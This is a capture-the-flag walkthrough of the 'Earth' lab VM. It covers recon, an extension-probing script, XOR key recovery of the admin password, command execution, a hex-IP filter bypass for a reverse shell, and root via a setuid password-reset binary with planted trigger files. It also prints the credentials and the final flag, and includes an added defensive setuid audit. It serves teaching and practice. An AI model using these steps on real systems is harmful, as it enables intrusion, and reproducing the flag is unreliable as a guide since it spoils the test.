Original: http://www.valesec.top/archives/theplanetsearth
THE PLANETS: EARTH
Target description
Difficulty: Easy Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
Here we use VirtualBox to import the target environment.
Host discovery
# root @ kali in ~ [10:43:57]
$ arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:7f:7c:c9, IPv4: 192.168.56.104
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:10   (Unknown: locally administered)
192.168.56.100  08:00:27:46:82:fe   PCS Systemtechnik GmbH
192.168.56.106  08:00:27:b9:35:aa   PCS Systemtechnik GmbH
Port scan
# root @ kali in ~ [10:44:09]
$ nmap -A 192.168.56.106
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-13 10:44 EST
Nmap scan report for 192.168.56.106
Host is up (0.00059s latency).
Not shown: 987 filtered tcp ports (no-response), 10 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
MAC Address: 08:00:27:B9:35:AA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
When I browsed to the web server it did not render correctly (port 80 answers "Bad Request (400)"), so I added hosts entries for the two names found in the port scan, which are the commonName and Subject Alternative Names of the TLS certificate:
# root @ kali in ~ [20:21:14]
$ cat /etc/hosts | grep "earth"
192.168.56.106 earth.local
192.168.56.106 terratest.earth.local
Visiting again, the site now loads normally.
Directory scan
terratest.earth.local
# root @ kali in ~ [9:10:51]
$ dirb https://terratest.earth.local/
---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)
END_TIME: Sat Nov 13 10:58:16 2021
DOWNLOADED: 4612 - FOUND: 3
A robots.txt was found here; view the file.
The last entry contains an unusual Disallow value, /testingnotes.*, with the extension wildcarded, so write a simple script to find out which extension actually exists:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# The box uses a self-signed certificate, so certificate verification is
# disabled below and the resulting warning is silenced.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

url = "https://terratest.earth.local/"
prefix = 'testingnotes'
suffix = [".asp", ".aspx", ".bat", ".c", ".cfm", ".cgi", ".com", ".dll", ".exe",
          ".htm", ".html", ".inc", ".jhtml", ".jsa", ".json", ".jsp", ".log",
          ".mdb", ".nsf", ".php", ".phtml", ".pl", ".reg", ".sh", ".sql",
          ".txt", ".xml"]

# Try every candidate extension and report the ones that return 200.
for i in suffix:
    new_url = url + prefix + i
    res = requests.get(new_url, verify=False)
    if res.status_code == 200:
        print("[+] %s is exist!" % new_url)
This shows which extension the prefix testingnotes has: testingnotes.txt.
# root @ kali in ~/Desktop [20:45:27]
$ python3 example.py
[+] https://terratest.earth.local/testingnotes.txt is exist!
Visiting this file gives new information.
From the notes we learn three things: the encryption algorithm is XOR, a file testdata.txt exists, and the admin user is terra. First fetch testdata.txt and save it.
earth.local
# root @ kali in ~/Desktop [20:53:56] C:2
$ dirb https://earth.local/
---- Scanning URL: https://earth.local/ ----
+ https://earth.local/admin (CODE:301|SIZE:0)
+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)
END_TIME: Sat Nov 13 20:54:15 2021
DOWNLOADED: 4612 - FOUND: 2
Two paths were detected. Visiting https://earth.local/admin shows previously submitted messages:
- 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
- 3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
- 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
Write a simple script that XORs one of these messages with testdata.txt; since XOR is its own inverse, ciphertext XOR plaintext yields the key:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
# Edit time: 2021/11/14 9:57
import binascii

# Hex message taken from /admin (the value is elided above).
data1 = "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"
# Hex-encode the known plaintext saved earlier.
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
# XOR as big integers. Caveat: this drops any leading 0x00 bytes of the
# result and assumes both inputs have the same length; a byte-wise XOR
# is the safer general form, but it is sufficient here.
print(hex(int(data1, 16) ^ int(f, 16)))
# Output:
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
The decoded output is the same 28-byte key repeated over and over (a repeating-key XOR), so only one period of it is needed.
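The two steps above (XOR ciphertext with known plaintext, then collapse the repeating keystream to a single period) generalize to any repeating-key XOR. The following is an added example, not the author's script: it does the XOR byte-wise so that leading zero bytes and unequal lengths are handled correctly, and finds the shortest period automatically instead of eyeballing it. The plaintext and hex message it uses are constructed stand-ins for testdata.txt and the /admin message; the key is the one recovered on the box.

```python
#!/usr/bin/env python3
"""Recover a repeating XOR key from a known plaintext/ciphertext pair.

Added illustration for this writeup, not the author's script. The sample
plaintext below is constructed; it stands in for testdata.txt, and the
constructed hex message stands in for the one posted on /admin.
"""
from itertools import cycle


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input.

    Unlike int(hex, 16) ^ int(hex, 16), this keeps leading zero bytes and
    never misaligns the two streams when their lengths differ.
    """
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a repeating key (XOR is its own inverse)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream: bytes) -> int:
    """Smallest p with stream[i] == stream[i + p] for every valid i.

    Only periods up to len(stream) // 2 are accepted, so the candidate key
    must be observed at least twice; otherwise the full stream is returned.
    """
    n = len(stream)
    for p in range(1, n // 2 + 1):
        if stream[p:] == stream[:-p]:
            return p
    return n


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """XOR ciphertext with its plaintext, then collapse the repeating key."""
    keystream = xor_bytes(ciphertext, known_plaintext)
    return keystream[:shortest_period(keystream)]


# Constructed sample data (not taken from the box).
SAMPLE_PLAINTEXT = (
    b"Earth is the third planet from the Sun and the only astronomical "
    b"object known to harbor life."
)
SAMPLE_KEY = b"earthclimatechangebad4humans"
SAMPLE_CIPHERTEXT_HEX = repeating_xor(SAMPLE_PLAINTEXT, SAMPLE_KEY).hex()


def demo() -> bytes:
    """Recover the key from the constructed hex message and its plaintext."""
    return recover_key(bytes.fromhex(SAMPLE_CIPHERTEXT_HEX), SAMPLE_PLAINTEXT)


if __name__ == "__main__":
    print(demo().decode())  # earthclimatechangebad4humans
```

The period search needs the plaintext to be at least twice as long as the key; with a shorter sample the whole keystream is returned and the repetition has to be judged by hand, exactly as the writeup does with the long hex output above.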
Then log in to https://earth.local/admin with the username terra and the password earthclimatechangebad4humans.
This leads to a page that allows command execution.
user_flag
The first flag is found in /var/earth_web/user_flag.txt.
root_flag
Next, get a reverse shell. Using the IP address directly in the command gives an error here.
Writing the address in hexadecimal gets past the check, and the shell connects back successfully.
Then look for setuid binaries:
bash-5.1$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
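The reason reset_root stands out in that list is that every other entry is a package-provided helper. On the defending side, the same observation becomes a check: enumerate setuid files and diff them against a known-good baseline. The following is an added example, not code from the original post; FOUND_ON_BOX is the find output above, and ASSUMED_BASELINE is an assumed allowlist of what a stock Fedora install ships, not a value taken from the page.

```python
#!/usr/bin/env python3
"""Audit setuid binaries against a known-good baseline.

Added defender-side illustration for this writeup, not code from the
original post. FOUND_ON_BOX is the find output from the box; ASSUMED_BASELINE
is an assumed allowlist of package-provided setuid helpers on Fedora, so any
hit outside it deserves a second look.
"""
import os
import stat
from typing import Iterable, List

# The find output from the box, as listed in the writeup.
FOUND_ON_BOX = [
    "/usr/bin/chage", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/pkexec", "/usr/bin/passwd",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/at", "/usr/bin/sudo",
    "/usr/bin/reset_root", "/usr/sbin/grub2-set-bootflag",
    "/usr/sbin/pam_timestamp_check", "/usr/sbin/unix_chkpwd",
    "/usr/sbin/mount.nfs", "/usr/lib/polkit-1/polkit-agent-helper-1",
]

# Assumed allowlist (not from the page): setuid files shipped by Fedora packages.
ASSUMED_BASELINE = {
    "/usr/bin/chage", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/pkexec", "/usr/bin/passwd",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/at", "/usr/bin/sudo",
    "/usr/sbin/grub2-set-bootflag", "/usr/sbin/pam_timestamp_check",
    "/usr/sbin/unix_chkpwd", "/usr/sbin/mount.nfs",
    "/usr/lib/polkit-1/polkit-agent-helper-1",
}


def find_suid(root: str = "/") -> List[str]:
    """Return regular files under root with the setuid bit set.

    Equivalent to `find / -perm -u=s -type f 2>/dev/null`.
    """
    hits = []
    skip = {"/proc", "/sys", "/dev", "/run"}
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune pseudo-filesystems; they hold no persistent binaries.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(found: Iterable[str], baseline: Iterable[str]) -> List[str]:
    """Setuid files present on the host but absent from the baseline."""
    return sorted(set(found) - set(baseline))


if __name__ == "__main__":
    # Run against the recorded list; use find_suid() for a live host.
    for path in unexpected_suid(FOUND_ON_BOX, ASSUMED_BASELINE):
        print("[!] unexpected setuid binary:", path)
```

On a real host the allowlist should come from the package manager rather than a hand-written set (for instance, `rpm -qf <path>` tells you whether a setuid file belongs to any installed package at all), and the scan is cheap enough to run from a periodic job so that a newly planted setuid helper is noticed rather than discovered during an incident.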
The odd /usr/bin/reset_root stands out; inspect it with strings.
bash-5.1$ strings /usr/bin/reset_root
strings /usr/bin/reset_root
/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
The binary imports setuid, access and system and carries a chpasswd command string, so it resets the root password when some "triggers" exist. Use nc to transfer the file out and find out why it fails.
Give it execute permission and trace the library calls to see the error:
# root @ kali in /tmp [23:17:05]
$ ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", 0) = -1
access("/dev/shm/Zw7bV9U5", 0) = -1
access("/tmp/kcM0Wewe", 0) = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
+++ exited (status 0) +++
The trace reveals three trigger files, checked with access(), none of which exist on the target:
bash-5.1$ ls /dev/shm/
ls /dev/shm/
bash-5.1$ ls /tmp/
ls /tmp/
So create the three files:
bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
Run reset_root again: this time the root password is reset, root is obtained with su, and the flag is retrieved.
bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su
su
Password: Earth
ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
ls /root
anaconda-ks.cfg root_flag.txt
cat /root/root_flag.txt
[ASCII-art globe]
Congratulations on completing Earth! If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
The final flag is: root_flag_b0da9554d29db2117b02aa8b66ec492e
Reference:
https://blog.gibbons.digital/hacking/2021/11/09/earth.html